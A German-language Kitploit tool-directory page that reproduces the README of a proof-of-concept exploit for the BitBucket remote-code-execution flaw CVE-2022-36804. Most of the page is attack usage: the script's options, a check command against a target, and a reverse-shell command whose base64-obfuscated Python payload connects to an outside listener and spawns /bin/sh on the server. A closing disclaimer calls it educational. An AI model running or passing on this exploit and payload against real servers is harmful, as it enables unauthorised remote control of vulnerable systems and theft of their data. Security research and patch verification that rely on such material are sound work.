Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-36804 — Ein echter Exploit für BitBucket RCE CVE-2022-36804 | Kitploit
Tools/GitHubGitHub/notdls/cve-2022-36804
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingRemote-Access-Tool
GitHubnotdls/cve-2022-36804

CVE-2022-36804

Ein echter Exploit für BitBucket RCE CVE-2022-36804

Repository anzeigen
357vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-36804 PoC

Dieses Repository enthält einen einfachen Proof-of-Concept-Exploit für die kürzlich entdeckte BitBucket-Schwachstelle zur Codeausführung von entfernten Standorten (CVE-2022-36804). Für die Ausnutzung dieser Schwachstelle ist Zugriff auf ein Repository auf der Zielinstanz erforderlich. Wenn Sie keine Anmeldeinformationen haben, muss das Ziel über öffentliche Repositorien verfügen.

Verwendung

root@kitploit:~
usage: exploit.py [-h] -p PROJECT -r REPO -u URL [-c COMMAND] [--proxy PROXY] [--session SESSION]
                  [--check]

Exploits the CVE-2022-36804 RCE in vulnerable BitBucket instances (< v8.3.1)

optionale Argumente:
  -h, --help            zeigt diese Hilfemeldung an und beendet das Programm
  -p PROJECT, --project PROJECT
                        Der Name des Projekts, in dem sich das öffentliche Repository befindet (z. B.
                        testproject)
  -r REPO, --repo REPO  Der Name des öffentlichen Repositorys (z. B. testrepo)
  -u URL, --url URL     Die URL des BitBucket-Servers (z. B. http://localhost:7990/)
  -c COMMAND, --command COMMAND
                        Der auf dem Server auszuführende Befehl (z. B. 'curl http://canary.domain/')
  --proxy PROXY         HTTP-Proxy für das Debugging (z. B. http://localhost:8080/)
  --session SESSION     Der Wert Ihres 'BITBUCKETSESSIONID'-Cookies, erforderlich, falls Ihr Ziel-
                        Repository privat ist. (z. B. 3DD8B1EBA3763AD2611F4940BD870865)
  --check               Nur eine Prüfung durchführen, ob die Instanz anfällig ist

Beispiele

Überprüfen, ob eine Instanz anfällig ist

Um zu überprüfen, ob eine Instanz anfällig ist, können Sie den folgenden Befehl ausführen:

root@kitploit:~
python3 exploit.py -p PROJECT -r REPO -u http://target.site/ --check

Eine Reverse-Shell einrichten

Mit dem folgenden Befehl kann eine Reverse-Shell auf dem Ziel eingerichtet werden (das Base64-Payload muss mit den Details Ihres Listeners aktualisiert werden):

root@kitploit:~
python3 exploit.py -p PROJECT -r REPO -u http://localhost:7990/ -c "echo 'cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC42Ny4zIiw4ODg4KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7cHR5LnNwYXduKCIvYmluL3NoIikn' | base64 -d  | bash |"

Credits

  • TheGrandPew – Identifikation und Meldung des Fehlers

Haftungsausschluss

Dieser Exploit dient Bildungs-/Forschungszwecken; ich bin nicht verantwortlich dafür, wie er verwendet wird. Seid nett :)

Tool herunterladen